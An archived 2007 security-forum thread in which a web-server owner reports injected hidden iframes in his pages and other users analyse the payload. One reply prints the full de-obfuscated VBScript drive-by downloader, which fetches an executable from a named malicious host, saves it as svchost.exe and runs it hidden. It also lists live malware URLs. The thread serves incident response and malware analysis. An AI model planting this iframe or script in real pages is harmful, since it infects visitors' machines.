Welcome to SecurityForumz.com!
FAQFAQ      ProfileProfile    Private MessagesPrivate Messages   Log inLog in

Server infected by a trojan

  
   Security Forums (Home) -> General Discussions RSS
Next:  Is Spyware Terminator good?  
Author Message
s

External


Since: Sep 06, 2007
Posts: 1



(Msg. 1) Posted: Thu Sep 06, 2007 4:25 pm
Post subject: Server infected by a trojan
Archived from groups: alt>comp>anti-virus (more info?)
Hi folks,
Hoping someone here might be able to give some advice on an infection.
Today at around 9:42am my local time one of my web servers got infected
somehow. What ever infected it then scanned through all .htm files on
the server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>


So, any time someone tried to view a site on my server they were also
directed to a Trojan download.

I have since removed these lines from all the .htm files but I have no
idea how someone managed to run a program on my server that inserted all
these lines.

Obviously I'm no expert on security etc but I have tried to make sure my
firewall is up to a reasonable standard and also have Norton AV
Corporate running on the server.

Any advice/help is much appreciated.

 >> Stay informed about: Server infected by a trojan 
Back to top
Login to vote
Gabriele Neukam

External


Since: Sep 14, 2004
Posts: 462



(Msg. 2) Posted: Thu Sep 06, 2007 5:42 pm
Post subject: Re: Server infected by a trojan [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)
On this special day, s wrote:

> Today at around 9:42am my local time one of my web servers got infected
> somehow. What ever infected it then scanned through all .htm files on the
> server and added the following line near the bottom of each one.
>
> I've removed the domain name:-
> <iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
> height=0></iframe>

Maybe it is related to this incident

http://www.heise-security.co.uk/news/95591


Gabriele Neukam

Gabriele.Spamfighter.Neukam RemoveThis @t-online.de

--
> Is there such a thing as a Honeymoon period in a new newsgroup?
(Roger Hunt in uk.comp.vintage)
In a want it now instantly straight away world - no Smile
(Krustov in ucv)

 >> Stay informed about: Server infected by a trojan 
Back to top
Login to vote
Virus Guy

External


Since: Aug 05, 2005
Posts: 424



(Msg. 3) Posted: Thu Sep 06, 2007 8:10 pm
Post subject: Re: Server infected by a trojan [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)
s wrote:

> (...) hker.htm

While searching the web for instances of kher.htm, I came across
these:

(warning - do not follow these links unless you know what you're
doing)

www.goldwindos2000.com/hkeraone/test.htm
us6.redhat520.com/haoba.htm

They are really executable files (not htm).

As of around 2 pm (EST), test.htm is identified mostly as a
downloader.trojan (4608.KF / 4608.102). Detection rate is 47% (not
detected by Kaspersky, Symantec among others).

haoba.htm is identified as Explorer.Hijack.AJYS / .4080. Detection
rate is 37%. Not detected by Avast, F-prot, Kaspersky, McAfee,
Microsoft, Symantec, among others.

---------------------------------

hker.htm is being coded with random spaces to give different MD5
hashes.

I submitted a sample to VT, and only 2 AV's id'd it as a threat:

Authentium: VBS/Psyme.BT@dl
NOD32v2: JS/Exploit.ADODB.Stream.Y

See this:

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=VBS_PSYME.FP

When you take out the spaces, here's what it is (can someone decode
this script and print the URL?)

(I removed a few < and > because my nntp server doesn't like HTML code
I guess)

html
scriptlanguage="VBScript"
onerrorresumenext
dl="http://www.goldwindos2000.com/hkeraone/test.htm"
Setdf=document.createElement("object")
df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Setx=df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
setS=df.createobject(stra,"")
S.type=1
c4="G"
c5="E"
c6="T"
strc=c4&c5&c6
x.Openstrc,dl,False
x.Send
fname1="svchost.exe"
setF=df.createobject("Scripting.FileSystemObject","")
settmp=F.GetSpecialFolder(2)
S.open
fname1=F.BuildPath(tmp,fname1)
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject("Shell.Application","")
Q.ShellExecutefname1,"","","open",0
/script
head
title Hello!!! /title
/head body
/body /html
 >> Stay informed about: Server infected by a trojan 
Back to top
Login to vote
Display posts from previous:   
Related Topics:
Discovery of trojan "package" on Win2K server yesterday (f.. - Removed the hard drive on a Win2K server and slaved it to an XP machine to run NAV and "The Cleaner" on it. Here's what was found: \winnt\system32\tskmgr2.exe Icon for this file is 3 books of different colors stacked horizontally, with a ye...

Explorer.exe infected with Trojan.Virtualroot - Well, here it goes: While configuring the routing and remote access on a Win2K server at home, I received a warning from Norton Antivirus Corporate edition about a file in C:\ called explorer.exe being infected with Trojan.Virtualroot. I disconnected..

upload a trojan to mydoom infected computer - i have an old 486 infected pc connected to other computer and i'm playing with mydoom.a in order to can upload a file by the backdoor and execute it. But all the trojans i probe cant be uploaded, i think by restrictions with the size of the file. I use....

Trojan Horse PSW.online infected - my pc has got partition tables (C:\ and D:\). Recently, they were both affected. The virus was found first in D:\ and swept through to other drives. The infected drive was D:\WINDOWS\System32\SSLDyn.dll It was found to be Trojan horse PSW.OnlineGames....

computer infected by trojan SHeur.AIJO - my computer suddenly keeps on rebooting and it has trojan horse SHeur.AIJO so plz tell whether they r connected and how to solve the problem.I have AVG antivirus by the way and it doesnt help
   Security Forums (Home) -> General Discussions All times are: Pacific Time (US & Canada) (change)
Page 1 of 1

 
 You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



[ Contact us | Terms of Service/Privacy Policy ]